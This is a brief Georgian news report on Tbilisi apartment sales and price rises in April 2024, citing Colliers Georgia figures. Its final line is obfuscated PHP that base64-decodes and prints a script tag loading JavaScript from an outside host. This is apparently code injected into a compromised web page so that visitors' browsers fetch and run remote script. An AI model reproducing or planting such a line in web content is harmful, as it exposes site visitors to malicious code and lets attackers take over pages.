celsiusi
ავერსი საქკაბელი

 2024 წლის აპრილში თბილისში 3 355 ბინა გაიყიდა. Colliers Georgia-ს მიერ დედაქალაქის საცხოვრებელი უძრავი ქონების ბაზრის განახლებული მიმოხილვის მიხედვით, გაყიდვების რაოდენობა 26%-ით გაიზარდა. ამასთან, აღნიშნულ პერიოდში გაყიდული ბინების ღირებულებამ ჯამში 217 მლნ დოლარი შეადგინა, რაც 32%-ით მეტია გასული წლის ამავე პერიოდის მაჩვენებელთან შედარებით.

რაც შეეხება ფასს, აპრილში როგორც ახალი, ასევე ძველი ბინები გაძვირდა.

"2024 წლის აპრილში თბილისში ახალაშენებული ბინების საშუალო შეწონილი გასაყიდი ფასი 8%-ით გაიზარდა გარეუბნებში, ფართო ცენტრსა და ქალაქის ცენტრში კი 12% და 4%-იანი ზრდა დაფიქსირდა.

2024 წლის აპრილში თბილისში ძველი ბინების საშუალო შეწონილი გასაყიდი ფასი 8%-ით გაიზარდა გარეუბნებში, ქალაქის ცენტრსა და ფართო ცენტრში კი 9% და 6%-იანი ზრდა დაფიქსირდა", - აღნიშნულია Recov.ge-ზე განახლებულ მიმოხილვაში.

170
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");